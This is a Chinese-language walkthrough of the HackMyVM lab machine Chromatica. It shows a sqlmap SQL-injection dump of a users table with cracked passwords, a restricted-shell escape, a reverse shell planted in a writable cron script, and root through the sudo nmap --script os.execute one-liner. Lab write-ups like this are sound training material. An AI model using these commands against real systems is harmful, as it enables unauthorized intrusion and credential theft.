简介
- 靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Chromatica
环境:
- 攻击机 kali 192.168.43.40
- 靶机 VB 192.168.43.41
开始渗透
靶机一打开就显示ip地址了,直接用nmap扫描端口
呕吼,这次还有个5353端口
目录扫描有个robots.txt
发现有个新的路径:
用HACKBAR改一下UA头,直接访问这个路径
里面是个搜索城市的搜索框
先随便搜一个,有个新的路径/search.php,看一下是一些城市的信息
随便选一个城市搜索,感觉有点像sql注入,手工测一下:
'闭合报错;'--+闭合有回显,直接上sqlmap
sqlmap拿到用户信息
sqlmap -u "http://192.168.43.41/dev-portal/search.php?city=" --user-agent="dev" -D Chromatica -T users -C id,username,password --dump --batch_____H__ ___ ___[']_____ ___ ___ {1.9.7.15#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 04:21:39 /2026-06-16/[04:21:40] [WARNING] provided value for parameter 'city' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[04:21:40] [INFO] resuming back-end DBMS 'mysql'
[04:21:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: city=' AND (SELECT 8540 FROM (SELECT(SLEEP(5)))eZLl) AND 'ToUj'='ToUjType: UNION queryTitle: Generic UNION query (NULL) - 4 columnsPayload: city=' UNION ALL SELECT NULL,CONCAT(0x717a6b6a71,0x4c77764871705a7578446c49586a6d4c46584176586149514a59466465656b636d69556275686967,0x71707a7171),NULL,NULL-- -
---
[04:21:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:21:40] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'Chromatica'
[04:21:40] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:21:40] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:21:40] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:21:40] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:21:40] [INFO] starting 6 processes
[04:21:41] [INFO] cracked password 'keeptrying' for user 'user'
Database: Chromatica
Table: users
[5 entries]
+----+-----------+-----------------------------------------------+
| id | username | password |
+----+-----------+-----------------------------------------------+
| 1 | admin | 8d06f5ae0a469178b28bbd34d1da6ef3 |
| 2 | dev | 1ea6762d9b86b5676052d1ebd5f649d7 |
| 3 | user | 3dd0f70a06e2900693fc4b684484ac85 (keeptrying) |
| 4 | dev-selim | f220c85e3ff19d043def2578888fb4e5 |
| 5 | intern | aaf7fb4d4bffb8c8002978a9c9c6ddc9 |
+----+-----------+-----------------------------------------------+[04:21:43] [INFO] table 'Chromatica.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.43.41/dump/Chromatica/users.csv'
[04:21:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.43.41'
[04:21:43] [WARNING] your sqlmap version is outdated[*] ending @ 04:21:43 /2026-06-16/这里应该是直接爆破MD5
下面这个图是源代码里的,他说上色啥的可能意思是彩虹表,我随便瞎猜的可能也是线索吧
这里我一开始用kali的hashcat配合rockyou字典,但是没爆破出来
用在线MD5有结果但是要收费md!还不便宜,算了直接去别人的wp里找一下解密的结果吧.......
admin:adm!n
dev:flaghere
user:keeptrying
dev-selim:
intern:intern00
这里只有dev这个用户能连,但是它返回了一些内容就直接断开连接了
返回的flag还是个假的,提交不上
这里没招了,看了大佬的wp才知道要保持ssh不被断开需要把窗口缩小到无法一次性打印全部字符,学到了
缩小窗口之后,再输入!bash就拿到了dev的shell
然后拿flag提交
提权
sudo -l无法执行,dev用户无法执行sudo命令
有一个bye.sh,打开看一下,可以运行more命令。
去gtfobins里找more命令,发现无法提权
嘶.....再找找别的
在/home下还有一个用户,看一下定时文件
发现用户analyst每分钟/bin/bash执行一个sh文件
dev@Chromatica:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
#查看我们这个用户对这个sh文件的权限,可读可写
直接写个反弹shell的命令进去
开监听,等着shell反弹,这里也有一个flag但是提交不了,先不管了
接着想办法提权到root。依旧sudo -l 发现可以用nmap命令。直接去gtfobins上找,但是发现用不了??????
后来去浏览器里搜索,还有一个gtfobins版本的nmap里面一种提权方式。如图:
(a)的内容是可用的
(b)的内容有版本限制
我也不知道为什么gtfobins官网里的nmap命令没有写(a)这种提权方式
跟着写命令,直接就提权成功了
analyst@Chromatica:~$ TF=$(mktemp)
TF=$(mktemp)
analyst@Chromatica:~$ echo 'os.execute("/bin/sh")'>$TF
echo 'os.execute("/bin/sh")'>$TF
analyst@Chromatica:~$ sudo nmap --script=$TF
sudo nmap --script=$TF
Starting Nmap 7.80 ( https://nmap.org ) at 2026-06-16 11:16 UTC
NSE: Warning: Loading '/tmp/tmp.j9TlFepk4l' -- the recommended file extension is '.nse'.
# is
/bin/sh: 1: is: not found
# id
uid=0(root) gid=0(root) groups=0(root)
拿flag,over
做完才发现5353端口好像没有用上........